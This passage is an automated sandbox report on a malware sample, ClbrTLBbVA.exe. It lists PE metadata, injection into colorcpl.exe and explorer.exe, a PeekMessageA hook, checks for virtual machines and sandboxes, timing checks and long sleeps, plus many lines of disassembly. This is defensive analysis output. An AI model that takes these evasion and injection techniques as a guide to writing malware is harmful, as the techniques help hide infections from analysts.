          Source: ClbrTLBbVA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ClbrTLBbVA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: ClbrTLBbVA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: oGIG5Ul.pdbSHA256 source: ClbrTLBbVA.exe
          Source: Binary string: colorcpl.pdbGCTL source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: oGIG5Ul.pdb source: ClbrTLBbVA.exe
          Source: Binary string: wntdll.pdbUGP source: ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ClbrTLBbVA.exe, ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0040ACE3 push edi; ret 11_2_0040ACEE
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D4B5 push eax; ret 11_2_0041D508
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D56C push eax; ret 11_2_0041D572
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D502 push eax; ret 11_2_0041D508
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D50B push eax; ret 11_2_0041D572
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_004175D6 push ss; ret 11_2_004175D9
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041EE15 pushfd ; ret 11_2_0041EE16
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016FD0D1 push ecx; ret 11_2_016FD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.289721058051092

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE4
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ClbrTLBbVA.exe PID: 5252, type: MEMORYSTR
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000179904 second address: 000000000017990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000179B7E second address: 0000000000179B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe TID: 5236 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 648 Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_00409AB0 rdtsc 11_2_00409AB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 874
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Process information queried: ProcessInformation
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000C.00000002.540183262.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\A%SystemRoot%\system32\mswsock.dllts\AppTiles\StoreBadgeLogo.pngU
          Source: explorer.exe, 0000000C.00000003.475865525.0000000006FFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000C.00000002.534112590.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 0000000C.00000003.474578907.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60200a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir?
          Source: explorer.exe, 0000000C.00000002.530543580.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000C.00000000.317619490.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000C.00000003.474578907.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC962 mov eax, dword ptr fs:[00000030h]11_2_016AC962
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AB171 mov eax, dword ptr fs:[00000030h]11_2_016AB171
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CB944 mov eax, dword ptr fs:[00000030h]11_2_016CB944
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C4120 mov eax, dword ptr fs:[00000030h]11_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C4120 mov ecx, dword ptr fs:[00000030h]11_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D513A mov eax, dword ptr fs:[00000030h]11_2_016D513A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9100 mov eax, dword ptr fs:[00000030h]11_2_016A9100
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AB1E1 mov eax, dword ptr fs:[00000030h]11_2_016AB1E1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017341E8 mov eax, dword ptr fs:[00000030h]11_2_017341E8
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D61A0 mov eax, dword ptr fs:[00000030h]11_2_016D61A0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017269A6 mov eax, dword ptr fs:[00000030h]11_2_017269A6
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA185 mov eax, dword ptr fs:[00000030h]11_2_016DA185
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CC182 mov eax, dword ptr fs:[00000030h]11_2_016CC182
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01771074 mov eax, dword ptr fs:[00000030h]11_2_01771074
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01762073 mov eax, dword ptr fs:[00000030h]11_2_01762073
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C0050 mov eax, dword ptr fs:[00000030h]11_2_016C0050
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BB02A mov eax, dword ptr fs:[00000030h]11_2_016BB02A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01774015 mov eax, dword ptr fs:[00000030h]11_2_01774015
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727016 mov eax, dword ptr fs:[00000030h]11_2_01727016
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov eax, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov ecx, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E90AF mov eax, dword ptr fs:[00000030h]11_2_016E90AF
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DF0BF mov ecx, dword ptr fs:[00000030h]11_2_016DF0BF
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DF0BF mov eax, dword ptr fs:[00000030h]11_2_016DF0BF
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9080 mov eax, dword ptr fs:[00000030h]11_2_016A9080
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01723884 mov eax, dword ptr fs:[00000030h]11_2_01723884
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016ADB60 mov ecx, dword ptr fs:[00000030h]11_2_016ADB60
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D3B7A mov eax, dword ptr fs:[00000030h]11_2_016D3B7A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016ADB40 mov eax, dword ptr fs:[00000030h]11_2_016ADB40
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778B58 mov eax, dword ptr fs:[00000030h]11_2_01778B58
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AF358 mov eax, dword ptr fs:[00000030h]11_2_016AF358
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0176131B mov eax, dword ptr fs:[00000030h]11_2_0176131B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D03E2 mov eax, dword ptr fs:[00000030h]11_2_016D03E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01775BA5 mov eax, dword ptr fs:[00000030h]11_2_01775BA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B1B8F mov eax, dword ptr fs:[00000030h]11_2_016B1B8F
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175D380 mov ecx, dword ptr fs:[00000030h]11_2_0175D380
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0176138A mov eax, dword ptr fs:[00000030h]11_2_0176138A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DB390 mov eax, dword ptr fs:[00000030h]11_2_016DB390
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E927A mov eax, dword ptr fs:[00000030h]11_2_016E927A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175B260 mov eax, dword ptr fs:[00000030h]11_2_0175B260
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778A62 mov eax, dword ptr fs:[00000030h]11_2_01778A62
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01734257 mov eax, dword ptr fs:[00000030h]11_2_01734257
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9240 mov eax, dword ptr fs:[00000030h]11_2_016A9240
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B8A0A mov eax, dword ptr fs:[00000030h]11_2_016B8A0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C3A1C mov eax, dword ptr fs:[00000030h]11_2_016C3A1C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BAAB0 mov eax, dword ptr fs:[00000030h]11_2_016BAAB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BAAB0 mov eax, dword ptr fs:[00000030h]11_2_016BAAB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DFAB0 mov eax, dword ptr fs:[00000030h]11_2_016DFAB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DD294 mov eax, dword ptr fs:[00000030h]11_2_016DD294
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DD294 mov eax, dword ptr fs:[00000030h]11_2_016DD294
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CC577 mov eax, dword ptr fs:[00000030h]11_2_016CC577
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CC577 mov eax, dword ptr fs:[00000030h]11_2_016CC577
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E3D43 mov eax, dword ptr fs:[00000030h]11_2_016E3D43
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01723540 mov eax, dword ptr fs:[00000030h]11_2_01723540
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C7D50 mov eax, dword ptr fs:[00000030h]11_2_016C7D50
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778D34 mov eax, dword ptr fs:[00000030h]11_2_01778D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0172A537 mov eax, dword ptr fs:[00000030h]11_2_0172A537
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D4D3B mov eax, dword ptr fs:[00000030h]11_2_016D4D3B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D4D3B mov eax, dword ptr fs:[00000030h]11_2_016D4D3B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D4D3B mov eax, dword ptr fs:[00000030h]11_2_016D4D3B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AAD30 mov eax, dword ptr fs:[00000030h]11_2_016AAD30
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01758DF1 mov eax, dword ptr fs:[00000030h]11_2_01758DF1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BD5E0 mov eax, dword ptr fs:[00000030h]11_2_016BD5E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BD5E0 mov eax, dword ptr fs:[00000030h]11_2_016BD5E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D35A1 mov eax, dword ptr fs:[00000030h]11_2_016D35A1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D1DB5 mov eax, dword ptr fs:[00000030h]11_2_016D1DB5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D1DB5 mov eax, dword ptr fs:[00000030h]11_2_016D1DB5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D1DB5 mov eax, dword ptr fs:[00000030h]11_2_016D1DB5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DFD9B mov eax, dword ptr fs:[00000030h]11_2_016DFD9B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DFD9B mov eax, dword ptr fs:[00000030h]11_2_016DFD9B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C746D mov eax, dword ptr fs:[00000030h]11_2_016C746D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173C450 mov eax, dword ptr fs:[00000030h]11_2_0173C450
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173C450 mov eax, dword ptr fs:[00000030h]11_2_0173C450
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA44B mov eax, dword ptr fs:[00000030h]11_2_016DA44B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DBC2C mov eax, dword ptr fs:[00000030h]11_2_016DBC2C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177740D mov eax, dword ptr fs:[00000030h]11_2_0177740D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177740D mov eax, dword ptr fs:[00000030h]11_2_0177740D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177740D mov eax, dword ptr fs:[00000030h]11_2_0177740D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726CF0 mov eax, dword ptr fs:[00000030h]11_2_01726CF0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726CF0 mov eax, dword ptr fs:[00000030h]11_2_01726CF0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726CF0 mov eax, dword ptr fs:[00000030h]11_2_01726CF0
